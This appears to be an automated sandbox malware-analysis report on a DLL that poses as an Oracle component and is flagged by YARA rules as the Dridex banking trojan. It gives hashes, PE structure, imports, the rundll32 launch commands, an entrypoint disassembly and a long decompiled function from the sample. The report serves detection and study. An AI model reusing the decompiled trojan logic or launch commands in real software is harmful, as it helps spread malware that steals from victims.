SHA1:	5E2FD9A1BB8B463A4FD5C20F2A64F4DB48A9FF5F
SHA-256:	F24C321D64DBFCA9FD2D8E2E53823D520661012EF094652B9F99CF19E4F2D7F3
SHA-512:	9D3F93AE26F6837B9E847D56081B9EB2584198C7AEE3943E5E5EE43F35DEC3339C03878449D9E061E6E48BB8430105BB2BE3525B1787C6DDA4D390884B971016
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......p..a........................`................1..........T.......8...........T...........p................................................................................................U...........B....... ......GenuineIntelW...........T...........B..a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB75.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Mon Dec 27 01:18:43 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	57898
Entropy (8bit):	1.9914877836784879
Encrypted:	false
SSDEEP:	192:VKdSLINMndkyhcr1+O5SkbUguD1WJzEuGH3pP4V2+TXvrr0nMlK:Na75LbUvhWthk3pP4U+D0M0
MD5:	5E80024C1D5EB0610E1C396FC9F80912
SHA1:	CCEC7E14A97CA0642472DDE29CF7198BB6A08D18
SHA-256:	F2FE4037BD3FAAC7EA5A9A562A8FD5BE1153D95AFA767AB57BD803CECB063655
SHA-512:	543E5AB651445F161EDC4DDAA15773651179A5989974C029CADD1A8A2F837610AE7673482CE84D1EBAFCF2CBC3BDE4D2B8769D21B526BB63FC0C0CE5801BB3B3
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......s..a........................\|...........$...T ......4....7..........`.......8...........T............"..B...........x ..........d"...................................................................U...........B......."......GenuineIntelW...........T...........B..a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFFBB.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8270
Entropy (8bit):	3.694252190090564
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNitf6X6YDc6GVgmfTwDSKCprG89bgusfMAm:RrlsNiV6X6YY6GVgmfTUSdgtfq
MD5:	DBA84585E8788BF8F91320DEDF86F303
SHA1:	92ECFFC1FEFE51B5FF0A801FF378592D7AF2B787
SHA-256:	454322977292BA82AD6DA1B0A463E3C92D11C428C388D23DB837602E67EA7D35
SHA-512:	48D44C71B08FA567D0840EB4212071AADD0DED3FF9E80ABF934E7F7411E91F9128375CFD9D6C8F9FA01850E9F33B2D338CA4F25B5AC2573070EE489ED7213E6D
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.8.8.4.<./.P.i.d.>.......

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.268800541773365
Encrypted:	false
SSDEEP:	12288:Om5W8LFz73jvcwQXhs89xeGH3nnNjHmIqF9TVpmWw9kHa4pE3wD3syl9:z5W8LFz73jvcwQXbc+89
MD5:	90EDA683473E94CDB547C9E29A6704FD
SHA1:	C684B1720DC7B4CE61FF7D132AF1003675232B83
SHA-256:	667FB919C79920BA6E051C6C429F35A9E5AAD14C345B1FB6CFD983602B91CA16
SHA-512:	13855B217E8E3C8008CBD0A01593F61131020E4A3AE3D0A129BE21B09C042832E89C011693018558DD8B6846A45DC9BD3B581F4BA921CF427AD75992B817E154
Malicious:	false
Preview:	regfQ...Q...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmn.J...................................................................................................................................................................................................................................................................................................................................................N.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	3.8421573356677157
Encrypted:	false
SSDEEP:	384:zUe59ZrdLdXX5vQp8XXLnxOf2oSPmxwpz5GjZmGuoDTTe25N5CAR1R:QwHrbXXepigf2oJxwptWmGu2TeyN53R1
MD5:	BC22BD8B89B50F6EDC15F85EDBC508F6
SHA1:	758DD39A69CA510B31E84E49C70D7DE4E7686518
SHA-256:	22D1EC65911BCAFE90317F4F1BCC754B211B66B94BE635F0ECDDBC81E3EC54C9
SHA-512:	4E1625E87B039B070DAFFD13CBD22012BE375201673472C48CBA1606B9CA7DC94A0FB0C52C1A9C0CC8111E7864263C0EF5C6777F50958E9B5503EA39AF649966
Malicious:	false
Preview:	regfP...P...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmn.J...................................................................................................................................................................................................................................................................................................................................................N.HvLE.^......P........................X............................. ..hbin................p.\..,..........nk,..BM.........X........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..BM......... ...........P............... .......Z.......................Root........lf......Root....nk ..BM......................}.............. ..............................DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.270377398586344
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	hMUh2Mkqyi.dll
File size:	536576
MD5:	8337dd22aa86bc357f8bc573441a97c7
SHA1:	6dc2600455a42651c95c3b612406dabd1182bfee
SHA256:	0341b7e0b66e27bee166ba1fd9fad700d85e58a257bbfed1b60a662d97fc1617
SHA512:	6a2572851e1ef774c35bf733455db6450f0c668d907f6617363037cb92277a022878c6fe7e652d035ed08f75f60c4a6463508a5feb7afb9a866c28d13577748c
SSDEEP:	6144:6KMImhktm7mnmvetmzK/kxwv4Zm7mREqZzdazdULd54f3X0kdVtL8faGAPlX:69hXAg5aX0CL8fI
File Content Preview:	MZ......................@...................................P......E;...;...;....Xl.....................2.4.^....uh.{...6.F......Xl.....F.z..............u..........z.......................@...8.{.G...;.......Rich;..........................................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10005a10
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61B705D1 [Mon Dec 13 08:35:29 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	e9192d34e4c9dcdf739aaa1d74025eb2

Entrypoint Preview

Instruction
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
add eax, 0Ch
add eax, 0Ch
add eax, 0Ch
add eax, 0Ch
add eax, 0Ch
add eax, 0Ch
cmp edx, 03h
je 00007F5AF0AB2D82h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push ebx
push esi
and esp, FFFFFFF8h
sub esp, 000000A0h
mov eax, dword ptr [ebp+08h]
mov ecx, 006B34C2h
mov edx, dword ptr [esp+7Ch]
mov dword ptr [esp+7Ch], 3CDA3086h
mov dword ptr [esp+00000094h], 00000000h
mov dword ptr [esp+00000090h], 006C4587h
mov byte ptr [esp+7Ah], FFFFFFBDh
mov dword ptr [esp+74h], 629729F9h
mov byte ptr [esp+65h], FFFFFFF1h
mov dword ptr [esp+38h], 694CC273h
mov esi, dword ptr [esp+00000094h]
mov edi, dword ptr [esp+00000090h]
mov ebx, edi
add ebx, 171E5389h
mov dword ptr [esp+30h], eax
mov eax, esi
adc eax, 00000000h
mov dword ptr [esp+48h], ebx
mov dword ptr [esp+4Ch], eax
mov dword ptr [esp+2Ch], edi
mov dword ptr [esp+28h], ecx
mov dword ptr [esp+24h], edx
mov dword ptr [esp+20h], esi
call 00007F5AF0AB6786h
mov ecx, 4C276534h
mov edx, dword ptr [esp+2Ch]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x780d0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x781b0	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x82000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x83000	0x1214	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x90f0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9000	0xe8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7a16	0x8000	False	0.362518310547	data	4.63110019551	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x6fb69	0x70000	False	0.311176845006	data	7.37787775173	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x79000	0x80f4	0x7000	False	0.295828683036	data	6.02916609898	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x82000	0x2f0	0x1000	False	0.090087890625	data	0.784979301457	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x83000	0x1d46	0x2000	False	0.287475585938	data	4.27724948186	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x82060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
KERNEL32.dll	CreateFileW, GetProcessVersion, GetModuleFileNameW, CloseHandle, VirtualAllocEx, DeleteTimerQueue, InitAtomTable
msvcrt.dll	wcscoll
SETUPAPI.dll	SetupDiOpenDeviceInterfaceW
WININET.dll	InternetReadFile
RPCRT4.dll	RpcMgmtSetCancelTimeout, NdrGetUserMarshalInfo
LZ32.dll	LZCopy
USER32.dll	BlockInput, TranslateMessage, FillRect, GetWindowTextA, DefMDIChildProcW, GetWindowContextHelpId, IsWinEventHookInstalled, GetClassNameA
NTDSAPI.dll	DsGetDomainControllerInfoW
IPHLPAPI.DLL	GetIpAddrTable
WS2_32.dll	WSACleanup, inet_addr
IMM32.dll	ImmGetCandidateListW
ADVAPI32.dll	CreateRestrictedToken, CryptGenKey, CryptAcquireContextW, RegCloseKey, CryptContextAddRef
GDI32.dll	GetViewportOrgEx, SetWindowOrgEx
pdh.dll	PdhAddCounterW
ole32.dll	CoCreateInstanceEx, CoGetObjectContext, StringFromGUID2
WINMM.dll	waveOutGetPitch
SHLWAPI.dll	AssocGetPerceivedType
ESENT.dll	JetInit

Exports

Name	Ordinal	Address
Wgpomsdeeomtunmdrt	1	0x10078125

Version Infos

Description	Data
OriginalFilename	Hen.dll
FileDescription	Oracle Call Interface
FileVersion	7.0.2.1.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 1132 Parent PID: 2172

General

Start time:	17:17:53
Start date:	26/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll"
Imagebase:	0xed0000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.627740230.000000006ED81000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4756 Parent PID: 1132

General

Start time:	17:17:54
Start date:	26/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3980 Parent PID: 1132

General

Start time:	17:17:54
Start date:	26/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\hMUh2Mkqyi.dll,Wgpomsdeeomtunmdrt
Imagebase:	0xa90000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.314520962.000000006ED81000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.317769975.000000006ED81000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4884 Parent PID: 4756

General

Start time:	17:17:54
Start date:	26/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1
Imagebase:	0xa90000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.351419736.000000006ED81000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.309940939.000000006ED81000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.313453262.000000006ED81000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5740 Parent PID: 4884

General

Start time:	17:18:35
Start date:	26/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4884 -s 740
Imagebase:	0x1280000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 5656 Parent PID: 3980

General

Start time:	17:18:37
Start date:	26/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 3980 -s 892
Imagebase:	0x1280000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 1132 Parent PID: 2172 loaddll32.exeCOMMON

Executed Functions

Function 6ED90730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6ED90730(void* __ecx) {
				void* __esi;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6ed9d1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6ED9361C(0x30);
					 *0x6ed9d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6ED93698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6ED9306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6ed9d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6ED90FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6ed9d1f8 + 0xb)) = _t162;
					_t363 = E6ED9306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6ed9d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6ED90730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6ed9bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6ED8F584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6ED8F828(_t429 + 0x24, E6ED8F4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6ED8F4BC(_t429 + 0x24, E6ED8F4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6ED95580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6ED8F654(_t429 + 0x20);
							E6ED955B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6ED95864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6ED8DFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6ED955B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6ED95864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6ED8DFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6ED955B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6ED95864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6ED8DFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6ED8CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6ED95558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6ED8CFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6ED95558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6ED8CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6ED95558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6ED8CFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6ED95558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6ED8CFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6ED95558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6ED8CFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6ED95558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6ed9d1f8 + 0x24)) = _t189;
							_t190 = E6ED91030(0xffffffffffffffff);
							_t320 =  *0x6ed9d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6ed9d1f8 + 0x2c)) = E6ED910A4(0xffffffffffffffff);
								L78:
								if(E6ED9306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6ed9d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6ED9306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6ed9d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6ED935F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6ED9306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
